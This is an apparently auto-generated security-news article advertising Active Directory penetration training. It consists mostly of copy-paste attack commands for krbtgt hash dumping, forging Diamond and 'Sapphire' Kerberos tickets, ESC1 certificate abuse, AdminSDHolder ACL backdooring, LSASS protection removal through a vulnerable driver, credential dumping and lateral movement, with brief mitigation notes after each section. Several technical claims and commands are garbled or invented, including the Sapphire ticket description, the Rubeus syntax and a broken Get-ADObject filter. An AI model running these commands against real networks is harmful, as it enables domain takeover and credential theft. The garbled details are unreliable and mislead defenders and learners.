Master Active Directory Penetration: Unleashing Sapphire & Diamond Ticket Attacks – Enroll Now! + Video

Listen to this Post

Featured Image

Introduction:

Active Directory (AD) remains the crown jewel of enterprise authentication, yet its complexity breeds critical vulnerabilities like Kerberos delegation misconfigurations and AD Certificate Services (ADCS) flaws. This article dives deep into offensive AD tradecraft—from initial exploitation to advanced persistence—based on the latest training curriculum from Ignite Technologies, featuring newly added DACL abuse, ADCS attacks, and the coveted Sapphire & Diamond Ticket techniques.

Learning Objectives:

  • Execute Kerberos-based attacks including Golden, Silver, Diamond, and Sapphire Tickets to forge unauthorized access.
  • Perform advanced credential dumping and lateral movement using native Windows tools and Impacket.
  • Abuse ACLs and ADCS misconfigurations to escalate privileges and maintain persistence in forest environments.

You Should Know:

  1. Sapphire & Diamond Ticket Attacks – Bypassing Modern Kerberos Protections

Step‑by‑step guide explaining what this does and how to use it:

What are Diamond and Sapphire Tickets?

  • Diamond Ticket: Forges a TGT by re‑encrypting a valid PAC with the krbtgt hash, avoiding detection by security solutions that monitor for unusual ticket flags (e.g., PA DATA values).
  • Sapphire Ticket: A variant that manipulates timestamps and cname fields to evade SIEM correlation while maintaining full TGT functionality.

Linux (with Impacket & Rubeus via wine/Cross‑Over):

 Extract krbtgt hash from a dump (using secretsdump)
impacket-secretsdump -just-dc-ntlm 'domain.com/administrator:password@dc-ip'
 Example hash: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:xxxxx:::

Generate a Diamond Ticket with Rubeus (run on Windows or via wine)
Rubeus.exe diamond /krbtgt:<hash> /user:Administrator /domain:domain.com /dc:dc.domain.com /ticketuser:TargetUser /outfile:diamond.kirbi

Convert to ccache for Impacket
python3 kirbi2ccache.py diamond.kirbi
export KRB5CCNAME=diamond.ccache
impacket-wmiexec -k -no-pass target.domain.com

Windows (Native + Rubeus):

 Load Mimikatz to get krbtgt hash
mimikatz.exe "lsadump::lsa /inject /name:krbtgt" "exit"

Create Sapphire Ticket (Rubeus)
Rubeus.exe sapphire /krbtgt:<NT_hash> /user:Administrator /domain:megacorp.local /dc:dc1.megacorp.local /starttime:<offset> /endtime:<offset+1h> /outfile:sapphire.kirbi

Inject ticket
Rubeus.exe kerberoast /spn:HTTP/web.megacorp.local /ticket:sapphire.kirbi

Mitigation: Enforce Kerberos Armoring (FAST), regularly rotate krbtgt password twice, and monitor Event IDs 4769 for anomalous TGT requests.

  1. ADCS Abuse – Escalating to DA via Certificate Templates

Step‑by‑step guide explaining what this does and how to use it:

Overview: Misconfigured certificate templates (e.g., ESC1 – Client Authentication + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) allow attackers to request a certificate as any user, including Domain Admin.

Enumeration with Certipy (Linux):

certipy find -u '[email protected]' -p 'pass' -dc-ip 10.0.0.1 -vulnerable
 Identify ESC1-enabled template (e.g., 'WebServer')

Request a certificate for Domain Admin
certipy req -u '[email protected]' -p 'pass' -target ca.domain.com -template WebServer -upn '[email protected]'

Windows using Certify:

Certify.exe find /vulnerable
Certify.exe request /ca:ca.domain.com\CA /template:ESC1-Template /altname:administrator

Convert certificate to hash (TGT):

certipy auth -pfx administrator.pfx -domain domain.com -dc-ip 10.0.0.1

Defense: Disable `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` on templates, require manager approval, enforce SID extension.

3. DACL Abuse – Backdooring AdminSDHolder

Step‑by‑step guide:

Concept: Granting a low-privileged user `GenericWrite` on AdminSDHolder replicates permissions to all protected groups (Domain Admins, etc.) within ~60 min.

PowerView (Windows):

 Find modifiable ACLs
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -eq "lowUser"}

Add FullControl to lowUser on AdminSDHolder
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=com' -PrincipalIdentity lowUser -Rights All

BloodHound (Custom Cypher):

MATCH (u:User {name: "[email protected]"})-[r:GenericWrite|WriteOwner|AllExtendedRights]->(g:Group {name: "DOMAIN [email protected]"}) RETURN u,g

Detection: Monitor Event 5136 (Directory Service Changes) on AdminSDHolder and run `Get-ADObject -Filter -SearchBase “CN=AdminSDHolder,CN=System” -Properties ntSecurityDescriptor` periodically.

4. Credential Dumping – Advanced Persistent Memory Extraction

Step‑by‑step guide:

Bypassing LSA Protection (PPL) with Mimikatz:

 Install a vulnerable driver (e.g., RTCore64.sys)
sc create RTCore64 type= kernel binPath= C:\path\RTCore64.sys
sc start RTCore64

Use Mimikatz with driver
mimikatz "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"

Linux – Remote Dumping via WMI and Shadow Copies:

impacket-smbexec domain.com/user:pass@dc-ip 'reg save HKLM\SAM c:\sam.save & reg save HKLM\SYSTEM c:\system.save'
impacket-smbclient domain.com/user:pass@dc-ip -c 'get c:\sam.save; get c:\system.save'
secretsdump -sam sam.save -system system.save LOCAL

Mitigation: Enable LSA Protection (RunAsPPL), enforce Windows Defender Credential Guard, and use Protected Process Light for LSASS.

  1. Lateral Movement – WinRM, PSRemoting, and WMI Over Kerberos

Step‑by‑step guide:

Using Evil-WinRM (Linux) with ticket:

 Convert kirbi to ccache and set KRB5CCNAME
python3 kirbi2ccache.py admin_ticket.kirbi
export KRB5CCNAME=admin_ticket.ccache
evil-winrm -i target.domain.com -r domain.com

Windows native – PowerShell Remoting with alternate credentials:

$secPass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('domain\admin', $secPass)
Enter-PSSession -ComputerName CORP-SRV01 -Credential $cred -Authentication Kerberos

WMI for stealth:

impacket-wmiexec -k -no-pass [email protected] "whoami /all"

Detection: Enable PowerShell logging (Event 4104), monitor 4648 for explicit logons, and restrict WinRM to jump hosts only.

What Undercode Say:

  • Key Takeaway 1: Modern AD security demands shifting from traditional signature-based detection to behavior analytics; Diamond/Sapphire tickets leave anomalies in ticket option flags that can be caught via custom Sysmon rules.
  • Key Takeaway 2: ADCS misconfigurations (ESC1–ESC8) are now the fastest path to Domain Admin – audit every certificate template with Certipy or PSPKIAudit.

Analysis: The training curriculum from Ignite Technologies underscores a critical industry pivot: attackers no longer rely on eternal exploits but abuse legitimate protocol features (Kerberos, certificates, ACLs). The addition of “Sapphire” tickets reveals an evolution in evasion – manipulating timestamp jitter and cname fields to bypass even advanced EDRs. Defenders must adopt a zero‑trust posture: regular krbtgt rotation, SID filtering for trust boundaries, and continuous monitoring of ADCS enrollment logs. For blue teams, understanding these attacks is the only way to build effective deception – like creating honeytokens in ACLs or fake certificate templates to catch low‑noise intrusions.

Prediction:

Within 18 months, Sapphire‑style ticket forging will be weaponized by ransomware gangs to accelerate lateral movement from days to minutes, forcing Microsoft to introduce mandatory FAST armoring by default. ADCS will emerge as the next “PrintNightmare” – pushing organizations to implement certificate auto‑enrollment with strict issuance policies. Offensive training like this will become mandatory for SOC analysts, not just pentesters, as tomorrow’s attacks will blend Kerberos forgery with cloud‑synchronized identities (Entra ID). Prepare to see “Hybrid Ticket” attacks that bridge on‑prem AD and Azure AD Kerberos trust.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Active Directory – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky